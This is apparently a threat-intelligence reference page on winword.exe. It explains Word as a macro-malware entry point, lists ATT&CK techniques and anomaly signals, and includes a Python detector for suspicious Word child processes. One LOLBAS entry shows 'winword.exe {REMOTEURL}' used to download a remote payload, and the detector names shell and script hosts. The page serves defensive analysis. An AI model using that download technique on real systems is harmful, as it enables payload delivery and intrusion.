Process

winword.exe

winword.exe is Microsoft Word, the word processor in Microsoft Office. It is one of the most common ways malware reaches a machine: a weaponized document arrives by email, the user opens it in Word, and a macro or an exploit runs code. For an analyst, Word matters most as the parent of whatever it spawns.

File identity

File details

Not observed.

Signing information

Not observed.

File version (0)

Not observed.

File size (0)

Not observed.

Execution context

File paths (0)

Not observed.

User context (0)

Not observed.

Integrity level (0)

Not observed.

Instances (0)

Not observed.

Session (0)

Not observed.

Token privileges (0)

Not observed.

Ancestry

Parents (0)

Not observed.

Children (0)

Not observed.

Grandparents (0)

Not observed.

Grandchildren (0)

Not observed.

Behavior

Loaded modules (0)

Not observed.

Named pipes (0)

Not observed.

Process handles (0)

Not observed.

Command-line patterns (0)

Not observed.

LOLBAS (1)
  • winword.exe {REMOTEURL} (Download) · It will download a remote payload and place it in INetCache.

Indicators

Hashes

Not observed.

Analysis

About this process

winword.exe is the Word application. It opens and edits documents (.doc, .docx, .docm, .rtf), and through Visual Basic for Applications (VBA) those documents can carry macros, code that runs inside Word. Word is part of Microsoft Office, so the genuine binary is installed under C:\Program Files\Microsoft Office (or the (x86) path), not in a Windows system folder, and is signed by Microsoft.

Legitimately, winword.exe is opened by users to read and write documents, parented by explorer.exe or launched from Outlook or a browser. Editing a document is unremarkable. Word starting another program is not.

Security notes

winword.exe is a top initial-access and execution vector (T1204.002). A user is convinced to open a document and its VBA macro runs the payload, often a short script that downloads and launches the next stage (T1059.005). The recognizable evidence is Word spawning a shell or script host: winword.exe as the parent of powershell.exe, cmd.exe, mshta.exe, or wscript.exe is one of the most reliable signs of a malicious document.

Word is also a persistence surface (T1137). Macro-enabled templates like the global Normal.dotm, and Word add-ins registered to load at startup, run attacker code every time Word opens. New or unexpected entries in Word's template and add-in locations warrant review. Because Word itself is legitimate, the children it spawns, the network it touches, and changes to its startup items are what separate ordinary editing from compromise.

Anomaly signals (5)
  • Image path outside the Microsoft Office install directory (high)
  • winword spawning cmd.exe, powershell.exe, mshta.exe, wscript.exe, or rundll32.exe (high)
  • Outbound network connections shortly after a document opens (high)
  • A child process running from or writing to Temp or AppData (high)
  • New templates or add-ins registered for Word (Normal.dotm, startup paths) (med)
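The image-path and parent/child checks from the security notes and anomaly signals above, as an added example that is not part of this page, run over a few constructed Sysmon-style process-creation records (the field names image, parent_image and command_line are assumed). The network and template signals need other event types and are not covered here.

```python
import ntpath

# Genuine winword.exe lives under the Office install root (Click-to-Run uses
# ...\Microsoft Office\root\Office16). Paths are compared case-insensitively.
OFFICE_DIRS = (
    "c:\\program files\\microsoft office\\",
    "c:\\program files (x86)\\microsoft office\\",
)
# Shells and script hosts Word has no business launching (from the anomaly list).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "rundll32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\")

# Constructed Sysmon-style process-creation records (field names are assumed).
EVENTS = [
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\notes.docx"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"powershell.exe -NoProfile -File C:\Users\alice\AppData\Local\Temp\stage.ps1"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\winword.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"winword.exe"},
]

def analyze(event):
    """Return [(signal, severity), ...] for one process-creation event."""
    image = event["image"].lower()
    parent = ntpath.basename(event["parent_image"].lower())
    name = ntpath.basename(image)
    cmd = event.get("command_line", "").lower()
    findings = []
    # Signal 1: a winword.exe image that is not under the Office install root.
    if name == "winword.exe" and not image.startswith(OFFICE_DIRS):
        findings.append(("winword image outside Office install directory", "high"))
    # Signals 2 and 4: what Word spawns, and where that child lives or points.
    if parent == "winword.exe":
        if name in SUSPICIOUS_CHILDREN:
            findings.append((f"winword spawned {name}", "high"))
        if any(d in image or d in cmd for d in USER_WRITABLE):
            findings.append(("winword child running from or referencing Temp/AppData", "high"))
    return findings

def triage(events):
    """Flatten findings across a batch as (event index, signal, severity)."""
    return [(i, sig, sev) for i, ev in enumerate(events) for sig, sev in analyze(ev)]

if __name__ == "__main__":
    for i, sig, sev in triage(EVENTS):
        print(f"event {i}: [{sev}] {sig}")
```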

Telemetry

OS prevalence (0)

Not observed.

Observation timeline

Not observed.

References
